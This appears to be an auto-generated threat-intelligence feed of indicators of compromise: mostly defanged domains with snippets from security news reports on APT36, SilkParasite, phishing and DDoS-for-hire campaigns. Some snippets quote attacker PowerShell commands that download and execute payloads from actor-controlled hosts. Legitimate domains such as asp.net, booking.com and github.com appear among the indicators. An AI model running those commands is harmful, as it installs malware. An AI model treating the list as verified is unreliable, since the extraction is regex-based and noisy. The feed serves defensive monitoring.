ZeroHour

Indicators of compromise

1,014 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use

TypeIndicatorContextArticleFirst seen
domainhandala-hack.toological operations and transnational repression, including Handala-Hack[.]to and Handala-Redwanted[.]to. The DOJ affidavit described “Handala Hack Uses CRUDEEXCLUDE to Disable Defender Protections and Deploy HEAVYGRAM
GBHackers
· 39m ago
domainhandala-redwanted.tod transnational repression, including Handala-Hack[.]to and Handala-Redwanted[.]to. The DOJ affidavit described “Heavygram” in incidents invHandala Hack Uses CRUDEEXCLUDE to Disable Defender Protections and Deploy HEAVYGRAM
GBHackers
· 39m ago
domainhoster-kg.comNodeEdgeRAT and NomadRAT. A sibling domain associated with hoster-kg[.]com was listed by Bitdefender as NodeEdgeRAT infrastructure,SilkParasite Hackers Use SpiceRAT Infrastructure to Target Central Asian Governments and Energy Firms
GBHackers
· 1h ago
domainhunt.ioence data showing a SpiceRat detection on port 80 (Source : Hunt.io). Researchers found no credential collection forms, payloadSilkParasite Hackers Use SpiceRAT Infrastructure to Target Central Asian Governments and Energy Firms
GBHackers
· 1h ago
domainit.comseller brands differ. A notable pivot involved ns2.asiainfo.it[.]com , which resolved to SpiceRAT servers in Estonia, BulgariaSilkParasite Hackers Use SpiceRAT Infrastructure to Target Central Asian Governments and Energy Firms
GBHackers
· 1h ago
domainskycom.supportand elsewhere during early 2026. Another hostname, manager.skycom[.]support , appeared in Bitdefender’s SilkParasite indicators and aSilkParasite Hackers Use SpiceRAT Infrastructure to Target Central Asian Governments and Energy Firms
GBHackers
· 1h ago
domaintdtu.orgsted by Bitdefender as NodeEdgeRAT infrastructure, while kg.tdtu[.]org shared a parent-domain relationship with a NomadRAT C2 inSilkParasite Hackers Use SpiceRAT Infrastructure to Target Central Asian Governments and Energy Firms
GBHackers
· 1h ago
domainuzrailwaystax.comcant link. Multiple hosts presented a certificate for azure.uzrailwaystax[.]com , an attacker-controlled domain impersonating Uzbekistan’SilkParasite Hackers Use SpiceRAT Infrastructure to Target Central Asian Governments and Energy Firms
GBHackers
· 1h ago
domain9527db6e1a.nxcli.iohe From line is where it falls apart. It comes from support@9527db6e1a[.]nxcli[.]io, which is not an OpenAI address. The link runs throughA fake ChatGPT billing email is after your OpenAI password
Help Net Security
· 1h ago
domainnotifications.googleapis.coms not link to the phishing site directly. Its URL starts at notifications[.]googleapis[.]com, a Google API redirect that forwards the browser to theA fake ChatGPT billing email is after your OpenAI password
Help Net Security
· 1h ago
domainnxcli.ioicators: the Google redirect link and two paths on the same nxcli[.]io host, login.php and key.php. Mail teams can search theirA fake ChatGPT billing email is after your OpenAI password
Help Net Security
· 1h ago
domainapi.mainnet.solana.comcampaign leverages the legitimate Solana blockchain via the api.mainnet.solana.com RPC endpoint to deliver the address of the second‑stage C2The Odyssey and trojans again: MovieReaper attacks users in multiple countries via compromised torrents
Kaspersky Securelist
· 1h ago
domaindeadhub.orgmemory and execute. While doing it, loader decodes https://deadhub[.]org domain name and if connection to it has failed, then it uThe Odyssey and trojans again: MovieReaper attacks users in multiple countries via compromised torrents
Kaspersky Securelist
· 1h ago
domainitorrents.orgpromised a widely used public repository of torrent files — itorrents[.]org . As a result, torrent trackers that relied on this reposThe Odyssey and trojans again: MovieReaper attacks users in multiple countries via compromised torrents
Kaspersky Securelist
· 1h ago
domainams1.vultrobjects.comntimeSSH_17[.]zip ZIP archive download location URL hxxps://ams1[.]vultrobjects[.]com/micbucket/Temp/0412.mp4 Decoy video download location UHackers Turn Telegram Into a Command Center for HEAVYGRAM Surveillance Malware
Cyber Security News
· 1h ago
domainmicbucket.ams1.vultrobjects.comket/Temp/0412.mp4 Decoy video download location URL hxxps://micbucket[.]ams1[.]vultrobjects[.]com/Exclude/Telegram.exe Malicious executable download loHackers Turn Telegram Into a Command Center for HEAVYGRAM Surveillance Malware
Cyber Security News
· 1h ago
domainppt1.sgp1.vultrobjects.comjgdb/efg_d4[.]zip ZIP archive download location URL hxxps://ppt1[.]sgp1[.]vultrobjects[.]com/myvideo.mp4 Decoy video download location URL hxxps:/Hackers Turn Telegram Into a Command Center for HEAVYGRAM Surveillance Malware
Cyber Security News
· 1h ago
domainsgp1.vultrobjects.com2174f6e691d6845ac645b68f1f2538 First-stage file URL hxxps://sgp1[.]vultrobjects[.]com/jttrepijgdb/Artificial%20intelligence.pptx Decoy documeHackers Turn Telegram Into a Command Center for HEAVYGRAM Surveillance Malware
Cyber Security News
· 1h ago
domainadm-devon.comated with Uzbek administration-themed spoofing Domain azure.adm-devon[.]com Uzbek administration-themed domain IP Address 5.183.95[.]SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domaincwisuz.com]net Domain impersonating the Galkynysh gas field Domain kg.cwisuz[.]com Domain observed on the same host IP Address 45.153.127[.]SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domaindevon-uz.com.]com NodeEdgeRAT-related sibling hostname Domain uzrailway.devon-uz[.]com BloodAlchemy-related railway-themed domain SHA-256 Hash 2SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domaindushanbeidc.orgsharing the LokiDev self-signed certificate Domain normativ.dushanbeidc[.]org Domain impersonating Tajikistan’s national IT hub projectSilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domaingalkynysh.netciated with Central Asian energy-themed domains Domain help.galkynysh[.]net Domain impersonating the Galkynysh gas field Domain kg.cwSilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainhoster-kg.comHost presenting the spoofed railway certificate Domain help.hoster-kg[.]com Domain linked to NodeEdgeRAT registration activity DomainSilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainhpsupporter.comHost with high-numbered remote desktop exposure Domain api.hpsupporter[.]com Support-themed infrastructure domain IP Address 46.30.191SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainhunt.iolowing operators to collect information and issue commands. Hunt.io analysts, working with researcher Guy Yasur, identified a cSilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domaininfocomkg.orgst with high-numbered remote desktop exposure Domain center.infocomkg[.]org Kyrgyzstan communications-themed domain Domain kg.tdtu[.]SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainit.come RTX Corporation impersonation page hosted on ns2.asiainfo.it[.]com (Source – Hunt.io) The certificate was issued by TLC, a cSilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainminings.blogeRAT host serving the copied RTX page Domain infrastructure.minings[.]blog Domain observed on copied RTX page infrastructure IP AddrSilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainmpekz.onlinessociated with Kazakh government-themed spoofing Domain gov.mpekz[.]online Kazakhstan government-themed domain IP Address 46.30.191[SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainnatcommunzu.comst associated with Uzbek telecom-themed spoofing Domain tmk.natcommunzu[.]com Uzbekistan communications-themed domain IP Address 46.30.SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainoilgas-tm.comassociated with Turkmen energy-themed spoofing Domain sanly.oilgas-tm[.]com Turkmen energy-themed domain IP Address 45.86.162[.]141 HSilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainpanterstationary.online31.59.185[.]224 Host serving the copied RTX page Domain ns.panterstationary[.]online Domain observed on copied RTX page infrastructure DomainSilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainplan-mail.com58.209[.]28 Host serving the copied RTX page Domain infoxxe.plan-mail[.]com Domain observed on copied RTX page infrastructure DomainSilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainpostmfa.comHost with high-numbered remote desktop exposure Domain mail.postmfa[.]com Foreign affairs-themed mail domain IP Address 45.153.127[SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainpresldent.infot associated with presidential-themed spoofing Domain state.presldent[.]info Presidential-themed typosquatting domain IP Address 46.30SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainskycom.supporttorical resolution for ns2.asiainfo.it[.]com Domain manager.skycom[.]support SpiceRAT-related hostname IP Address 194.68.225[.]168 HisSilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainsozandagon.orgassociated with Tajikistan-themed spoofing Domain normativ.sozandagon[.]org Tajikistan-themed domain IP Address 192.121.87[.]172 HostSilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domaintaustas.comomain observed on copied RTX page infrastructure Domain pro.taustas[.]com Domain observed on copied RTX page infrastructure IP AddrSilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domaintdtu.orgmkg[.]org Kyrgyzstan communications-themed domain Domain kg.tdtu[.]org Domain sharing a parent domain with NomadRAT infrastructuSilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domaintmgaz-server.comserving copied RTX page and spoofed certificate Domain www.tmgaz-server[.]com Domain impersonating Türkmengaz IP Address 46.30.188[.]54SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domaintojiktelecomtj.com46.30.188[.]54 Host serving the copied RTX page Domain www.tojiktelecomtj[.]com Domain impersonating Tojiktelecom IP Address 31.58.209[.]SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainuzrailwaystax.comss 2.58.14[.]95 Hunt.io-detected SpiceRAT host Domain azure.uzrailwaystax[.]com Spoofed Uzbek railway-themed domain IP Address 31.59.185[SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainwww.tm-mfa.coms 185.243.114[.]124 Host serving the copied RTX page Domain www[.]tm-mfa[.]com Domain observed on copied RTX page infrastructure IP AdSilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainyntymak-ord.comciated with Kyrgyz presidential-themed spoofing Domain data.yntymak-ord[.]com Kyrgyz presidential residence-themed domain IP Address 19SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainyntymak-ordo.comated with Kyrgyz presidential-themed spoofing Domain center.yntymak-ordo[.]com Kyrgyz presidential residence-themed domain IP Address 45SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainytnymak-ord.comciated with Kyrgyz presidential-themed spoofing Domain link.ytnymak-ord[.]com Kyrgyz presidential residence-themed domain IP Address 19SilkParasite-Linked Malware Infrastructure Traced Back Four Years Across Central Asia
Cyber Security News
· 1h ago
domainnightmare-stresser.comattacks targeting online platforms and services. Before the nightmare-stresser[.]com and nightmarestresser[.]org were taken down , the stresseUS takes down NightmareStresser DDoS-for-hire platform
BleepingComputer
· 2h ago
domainnightmarestresser.com22, the U.S. Department of Justice (DOJ) also took down the nightmarestresser[.]com domain and arrested six suspects who allegedly owned multUS takes down NightmareStresser DDoS-for-hire platform
BleepingComputer
· 2h ago
domainnightmarestresser.orgforms and services. Before the nightmare-stresser[.]com and nightmarestresser[.]org were taken down , the stresser service described itself aUS takes down NightmareStresser DDoS-for-hire platform
BleepingComputer
· 2h ago
domainbiktpw.topdomains showing the pattern used by the campaign: t-mobile.biktpw[.]top t-mobile.cugbjl[.]top t-mobile.cymfjd[.]top t-mobile.gdikT-Mobile rewards points expiry texts are a phishing scam
Malwarebytes Labs
· 3h ago
domaincugbjl.topattern used by the campaign: t-mobile.biktpw[.]top t-mobile.cugbjl[.]top t-mobile.cymfjd[.]top t-mobile.gdikxv[.]top t-mobile.hdzcT-Mobile rewards points expiry texts are a phishing scam
Malwarebytes Labs
· 3h ago
domaincymfjd.toppaign: t-mobile.biktpw[.]top t-mobile.cugbjl[.]top t-mobile.cymfjd[.]top t-mobile.gdikxv[.]top t-mobile.hdzcnb[.]top t-mobile.koxeT-Mobile rewards points expiry texts are a phishing scam
Malwarebytes Labs
· 3h ago
domaingdikxv.top[.]top t-mobile.cugbjl[.]top t-mobile.cymfjd[.]top t-mobile.gdikxv[.]top t-mobile.hdzcnb[.]top t-mobile.koxetp[.]top t-mobile.nxdcT-Mobile rewards points expiry texts are a phishing scam
Malwarebytes Labs
· 3h ago
domainhdzcnb.top[.]top t-mobile.cymfjd[.]top t-mobile.gdikxv[.]top t-mobile.hdzcnb[.]top t-mobile.koxetp[.]top t-mobile.nxdcfp[.]top t-mobile.pkrbT-Mobile rewards points expiry texts are a phishing scam
Malwarebytes Labs
· 3h ago
domainkoxetp.top[.]top t-mobile.gdikxv[.]top t-mobile.hdzcnb[.]top t-mobile.koxetp[.]top t-mobile.nxdcfp[.]top t-mobile.pkrbai[.]top t-mobile.qfrhT-Mobile rewards points expiry texts are a phishing scam
Malwarebytes Labs
· 3h ago
domainnxdcfp.top[.]top t-mobile.hdzcnb[.]top t-mobile.koxetp[.]top t-mobile.nxdcfp[.]top t-mobile.pkrbai[.]top t-mobile.qfrhkt[.]top t-mobile.qsciT-Mobile rewards points expiry texts are a phishing scam
Malwarebytes Labs
· 3h ago
domainpkrbai.top[.]top t-mobile.koxetp[.]top t-mobile.nxdcfp[.]top t-mobile.pkrbai[.]top t-mobile.qfrhkt[.]top t-mobile.qscizj[.]top t-mobile.tmfnT-Mobile rewards points expiry texts are a phishing scam
Malwarebytes Labs
· 3h ago
domainqfrhkt.top[.]top t-mobile.nxdcfp[.]top t-mobile.pkrbai[.]top t-mobile.qfrhkt[.]top t-mobile.qscizj[.]top t-mobile.tmfncb[.]top t-mobile.vmnqT-Mobile rewards points expiry texts are a phishing scam
Malwarebytes Labs
· 3h ago
domainqscizj.top[.]top t-mobile.pkrbai[.]top t-mobile.qfrhkt[.]top t-mobile.qscizj[.]top t-mobile.tmfncb[.]top t-mobile.vmnqsu[.]top Stop threatsT-Mobile rewards points expiry texts are a phishing scam
Malwarebytes Labs
· 3h ago
domaintmfncb.top[.]top t-mobile.qfrhkt[.]top t-mobile.qscizj[.]top t-mobile.tmfncb[.]top t-mobile.vmnqsu[.]top Stop threats before they can do anyT-Mobile rewards points expiry texts are a phishing scam
Malwarebytes Labs
· 3h ago
domainvmnqsu.top[.]top t-mobile.qscizj[.]top t-mobile.tmfncb[.]top t-mobile.vmnqsu[.]top Stop threats before they can do any harm. Malwarebytes BrT-Mobile rewards points expiry texts are a phishing scam
Malwarebytes Labs
· 3h ago
domainbackblazeb2.comion Payload staging URL hxxps://clients-easy.s3.us-east-005.backblazeb2[.]com/Automata-20.zip RUSTYMOVE payload archive Payload stagingAPT36 Uses USB-Spreading Malware to Reach Air-Gapped Government Networks
Cyber Security News
· 4h ago
domainindiatodays.org[.]org Domain used to stage payloads Payload staging domain indiatodays[.]org Domain used to stage payloads Payload staging URL theprinAPT36 Uses USB-Spreading Malware to Reach Air-Gapped Government Networks
Cyber Security News
· 4h ago
domainofficialinfo.org[.]org Domain used to stage payloads Payload staging domain officialinfo[.]org Domain used to stage payloads Payload staging domain indiAPT36 Uses USB-Spreading Malware to Reach Air-Gapped Government Networks
Cyber Security News
· 4h ago
domaintheprints.orgcac18da31 Automata-20.exe, RUSTYMOVE Payload staging domain theprints[.]org Domain used to stage payloads Payload staging domain offiAPT36 Uses USB-Spreading Malware to Reach Air-Gapped Government Networks
Cyber Security News
· 4h ago
domainindiatodays.orgoutlets, including theprints[.]org , spoofing ThePrint, and indiatodays[.]org , spoofing India Today. These domains hosted intermediaryAPT36 Targets Indian Government and Defense Organizations With New Rust Malware Arsenal
GBHackers
· 4h ago
domainofficialinfo.orgyload staging domain theprints[.]org Payload staging domain officialinfo[.]org Payload staging domain indiatodays[.]org Payload stagingAPT36 Targets Indian Government and Defense Organizations With New Rust Malware Arsenal
GBHackers
· 4h ago
domaintheprints.orgdomains impersonating major Indian news outlets, including theprints[.]org , spoofing ThePrint, and indiatodays[.]org , spoofing IndAPT36 Targets Indian Government and Defense Organizations With New Rust Malware Arsenal
GBHackers
· 4h ago
domaintradingclaw.pro: HP) The installer is genuine Microsoft software The site, tradingclaw[.]pro, gave its bot a name that echoes a well-known AI assistanFake AI trading agent steals crypto wallet passwords
Help Net Security
· 6h ago
domaingithub.comv Tunnels endpoint pattern abused to expose RDP URL https://github[.]com/mirror-js/mirror-js/refs/heads/main/js/js-webpack.zip ArcNightEagle Hackers Abuse Microsoft Dev Tunnels and GhostContainer to Breach Russian Companies
Cyber Security News
· 6h ago
domainbackblazeb2.comhow up unexpectedly in DNS or proxy logs: api.telegram.org, backblazeb2.com, vultrobjects.com, storjshare.io, iproyal.com, and lightninChosen Brick, Iran’s Surveillance Malware
Security Affairs
· 7h ago
domainiproyal.comgram.org, backblazeb2.com, vultrobjects.com, storjshare.io, iproyal.com, and lightningproxies.net. None of these are malicious on tChosen Brick, Iran’s Surveillance Malware
Security Affairs
· 7h ago
domainlightningproxies.netzeb2.com, vultrobjects.com, storjshare.io, iproyal.com, and lightningproxies.net. None of these are malicious on their own, which is exactlyChosen Brick, Iran’s Surveillance Malware
Security Affairs
· 7h ago
domainvultrobjects.comly in DNS or proxy logs: api.telegram.org, backblazeb2.com, vultrobjects.com, storjshare.io, iproyal.com, and lightningproxies.net. NoneChosen Brick, Iran’s Surveillance Malware
Security Affairs
· 7h ago
domainasp.netis a .NET-based implant designed to blend into Exchange and ASP.NET activity while providing command execution, proxying, sockeNightEagle Hackers Target Russian Companies Using GhostContainer Backdoor
GBHackers
· 8h ago
domainasp.netis a .NET-based implant designed to blend into Exchange and ASP.NET activity while providing command execution, proxying, sockeNightEagle Hackers Abuse Microsoft Dev Tunnels and GhostContainer to Breach Russian Companies
GBHackers
· 8h ago
domainnightmare-stresser.comce known as NightmareStresser. The domains in question are: nightmare-stresser[.]com and nightmarestresser[.]org. Visitors to the site are nowU.S. Seizes NightmareStresser Domains Linked to Hundreds of Thousands of DDoS Attacks
The Hacker News
· 9h ago
domainnightmarestresser.comDecember 2022, another domain linked to NightmareStresser ("nightmarestresser[.]com") was among the 48 domains that were seized by the DoJ. EU.S. Seizes NightmareStresser Domains Linked to Hundreds of Thousands of DDoS Attacks
The Hacker News
· 9h ago
domainnightmarestresser.org. The domains in question are: nightmare-stresser[.]com and nightmarestresser[.]org. Visitors to the site are now greeted by a seizure bannerU.S. Seizes NightmareStresser Domains Linked to Hundreds of Thousands of DDoS Attacks
The Hacker News
· 9h ago
domainadtarget.complain sight: adtargett[.]com differed by a single “t” from adtarget[.]com , an advertising domain registered in 1998. The lookalikeWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 18h ago
domainadtargett.comick marketing review. One delivery host hid in plain sight: adtargett[.]com differed by a single “t” from adtarget[.]com , an advertiWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 18h ago
domainbooking.comects for typosquatted domains, like buking[.]com instead of booking[.]com ) only wake up on specific target sites, so they stayed tWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 18h ago
domainbuking.comink rewriters, and redirects for typosquatted domains, like buking[.]com instead of booking[.]com ) only wake up on specific targeWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 18h ago
domaincdnpps.usSeveral embedded domains ( sugabit[.]net , votetoda[.]com , cdnpps[.]us , and telemetry endpoint hanstrackr[.]com ) sat inside thWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 18h ago
domainhanstrackr.comnet , votetoda[.]com , cdnpps[.]us , and telemetry endpoint hanstrackr[.]com ) sat inside these disabled modules. On the shop, the actWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 18h ago
domainjullyambery.netdomain names ( scrprime[.]com , youronlinesearches[.]com , jullyambery[.]net ) remained identical to older captures, what those endpoiWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 18h ago
domainscrprime.comto change its behavior. While the hardcoded domain names ( scrprime[.]com , youronlinesearches[.]com , jullyambery[.]net ) remainedWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 18h ago
domainsugabit.netd turned off on this storefront. Several embedded domains ( sugabit[.]net , votetoda[.]com , cdnpps[.]us , and telemetry endpoint hWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 18h ago
domainvotetoda.comthis storefront. Several embedded domains ( sugabit[.]net , votetoda[.]com , cdnpps[.]us , and telemetry endpoint hanstrackr[.]com )When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 18h ago
domainyouronlinesearches.comhavior. While the hardcoded domain names ( scrprime[.]com , youronlinesearches[.]com , jullyambery[.]net ) remained identical to older captureWhen scanners miss the attack: how Cloudflare Client-Side Security protects storefronts
Cloudflare Blog
· 18h ago
domainasp.netxtraction of cryptographic keys used by the server from the ASP.NET configuration, followed by overwriting the VIEWSTATE framewThree Threat Groups Target Russian Enterprises With Backdoors, Ransomware, and Wipers
The Hacker News
· 22h ago
domainipapi.cobtain the public IP address by querying api.ipify[.]org and ipapi[.]co, and disable a number of backup, database, and recovery mThree Threat Groups Target Russian Enterprises With Backdoors, Ransomware, and Wipers
The Hacker News
· 22h ago
domainipify.orgommand Prompt, obtain the public IP address by querying api.ipify[.]org and ipapi[.]co, and disable a number of backup, database,Three Threat Groups Target Russian Enterprises With Backdoors, Ransomware, and Wipers
The Hacker News
· 22h ago
domainbackblazeb2.coms using the following command: powershell wget https://f005.backblazeb2[.]com/file/Clients-easy/DriverInstaller.zip -o ww.zip C2 communOperation RapidRust: APT36 Deploys RUSTYSHADE, RUSTYMOVE, PSNATCH, and BASHNATCH
Zscaler ThreatLabz
· 23h ago
domainindiatodays.orgconhost.exe --headless powershell.exe -EncodedCommand [irm indiatodays[.]org/pv | iex] Create scheduled tasks that execute payloads atOperation RapidRust: APT36 Deploys RUSTYSHADE, RUSTYMOVE, PSNATCH, and BASHNATCH
Zscaler ThreatLabz
· 23h ago
domainbjssourcing.comrs of Compromise (IoCs):- Type Indicator Description Domain bjssourcing[.]com Lookalike sender domain used in the procurement-officer pGhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds
Cyber Security News
· 23h ago
domainelitechiropracticandrehab.comcrypted redirect destination Domain account-access-rc3uenqi.elitechiropracticandrehab[.]com Device-code phishing server hosted under a likely compromGhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds
Cyber Security News
· 23h ago
domainflipbookonlinevault.coment used as the document-sharing lure URL hxxps://chartered.flipbookonlinevault[.]com/scanna/200e61bfe54c92fb720c77c3a1661bc0/b5ea87c2ddac3aa14GhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds
Cyber Security News
· 23h ago
domaingreenlightdlstribution.comender domain used in the procurement-officer pretext Domain greenlightdlstribution[.]com Related impersonation domain registered during the campaiGhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds
Cyber Security News
· 23h ago

Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.